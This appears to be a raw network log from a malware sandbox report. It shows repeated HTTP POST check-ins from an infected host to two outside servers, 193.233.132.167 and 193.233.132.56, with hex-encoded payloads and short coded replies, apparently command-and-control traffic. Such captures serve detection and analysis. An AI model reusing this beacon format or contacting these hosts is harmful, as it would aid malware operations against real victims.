Apr 19, 2024 03:36:09.421797037 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1345        192.168.2.5  51199        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:09.326678038 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:09.575186968 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port
1346        192.168.2.5  51200        193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:09.677414894 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:09.935048103 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP   Destination Port
1347        192.168.2.5  51201        193.233.132.167  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:09.824156046 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:10.071249962 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP    Source Port  Destination IP  Destination Port
1348        192.168.2.5  51202        193.233.132.56  80
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:36:10.273195982 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:10.520473957 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1349   192.168.2.5   51203   193.233.132.167   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.406373978 CEST   155   OUT   POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.646325111 CEST   197   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1350   192.168.2.5   51204   193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.774246931 CEST   312   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.027766943 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1351   192.168.2.5   51205   193.233.132.167   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:10.895679951 CEST   309   OUT   POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.145231009 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1352   192.168.2.5   51206   193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.363374949 CEST   158   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.611327887 CEST   219   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1353   192.168.2.5   51207   193.233.132.167   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.499037981 CEST   155   OUT   POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.747673988 CEST   197   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1354   192.168.2.5   51208   193.233.132.56   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.861920118 CEST   312   OUT   POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:12.107544899 CEST   196   IN   HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID   Source IP   Source Port   Destination IP   Destination Port
                                                                                                                                                                                                                                      1355   192.168.2.5   51209   193.233.132.167   80
                                                                                                                                                                                                                                      Timestamp   Bytes transferred   Direction   Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:11.996154070 CEST   309   OUT   POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:12.245441914 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1356 | 192.168.2.5 | 51210 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:12.438359976 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:12.677223921 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1357 | 192.168.2.5 | 51211 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:12.585504055 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:12.831057072 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1358 | 192.168.2.5 | 51212 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:12.929544926 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:13.181548119 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1359 | 192.168.2.5 | 51213 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:13.079039097 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:13.327615023 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1360 | 192.168.2.5 | 51214 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:13.507913113 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:13.750281096 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1361 | 192.168.2.5 | 51215 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:13.667525053 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:13.915930986 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1362 | 192.168.2.5 | 51216 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:14.002882004 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:14.254292011 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:36:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1363 | 192.168.2.5 | 51217 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:14.162364006 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
